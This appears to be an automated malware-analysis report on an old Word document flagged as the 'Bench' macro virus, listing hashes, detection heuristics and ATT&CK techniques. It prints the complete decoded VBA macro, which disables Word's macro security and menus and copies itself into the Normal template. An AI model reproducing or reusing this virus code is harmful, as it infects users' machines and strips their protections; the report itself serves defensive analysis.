Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd95fcb6939b7a6e…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 1999-11-05 09:53:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 6c92160960f0552ee6cb43c169a7787a
SHA-1: 2728b009a4548e082136342c87d948d29ae54b27
SHA-256: cd95fcb6939b7a6e4df0267bedbacb253ff484dd22bd9fad07bdebb8c0c23e57
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious Office documents. The script attempts to disable security features and modify macro settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security. It also contains an embedded URL, http://www.bigbrotherinside.com, which may be used for further payload delivery. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Bench-1' further indicate malicious intent.

Heuristics (6)

  • ClamAV: Win.Trojan.Psycho-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.bigbrotherinside.com (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2959 bytes
SHA-256: 7e31fab920789af7d16c0b1ace907b2a363ed113e38ae3dbcaf2028a80663c8c
Detection: ClamAV: Doc.Trojan.Bench-1
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
MACRONAME = BENCH2
On Error Resume Next
Application.Options.ConfirmConversions = 1 - 1
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
With CommandBars("Tools")
    .Controls("Macro").Delete
    .Controls("Customize...").Delete
    .Controls("Templates and Add-Ins...").Delete
End With
CommandBars("Format").Controls("Style...").Enabled = 0: CommandBars("View").Controls("Toolbars").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Application.Version = 9# Then
CommandBars("Macro").Controls("Security...").Delete
Else
With Application.Options
    .VirusProtection = 1 - 1
    .SaveNormalPrompt = 1 - 1
End With
End If
AI = False: NI = False
Set AL = ActiveDocument.VBProject.vbcomponents.Item(1): Set NL = NormalTemplate.VBProject.vbcomponents.Item(1)
A_AmIReAL = AL.CodeModule.Lines(2, 1): N_AmIReal = NL.CodeModule.Lines(2, 1)
If UCase(A_AmIReAL) = "MACRONAME = BENCH2" Then AI = True: If UCase(N_AmIReal) = "MACRONAME = BENCH2" Then NI = True
If AI = True And NI = True Then GoTo 0
Application.ScreenUpdating = 1 - 1
If AI = False Then
himala = AL.CodeModule.Countoflines
torpedo = NL.CodeModule.Countoflines
If himala > 0 Then AL.CodeModule.Deletelines 1, himala
With AL.CodeModule
    .addfromstring ("Sub AutoOpen()" & vbCr & NL.CodeModule.Lines(2, torpedo))
End With
End If
If NI = False Then
Luha = AL.CodeModule.Countoflines
Exodus = NL.CodeModule.Countoflines
If Exodus > 0 Then NL.CodeModule.Deletelines 1, Exodus
With NL.CodeModule
.addfromstring ("Sub AutoClose()" & vbCr & AL.CodeModule.Lines(2, Luha))
End With
End If
0:
If MacroContainer = ActiveDocument Then
If Minute(Now) >= 25 And Minute(Now) <= 40 Then
    With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Heading = "[Bench]"
        .Text = "I'm not suffering from insanity! I'm enjoying every minute of it!"
        .Show
    End With
ActiveDocument.Content.Font.Animation = wdAnimationShimmer
ElseIf Minute(Now) > 40 And Minute(Now) <= 59 Then
    With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Heading = "Defend your PC's privacy!"
        .Text = "Boycott Intel!" & vbCr & "http://www.bigbrotherinside.com"
        .Animation = msoAnimationGetAttentionMajor
        .Show
    End With
End If
End If
If NI = True And AI = False And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub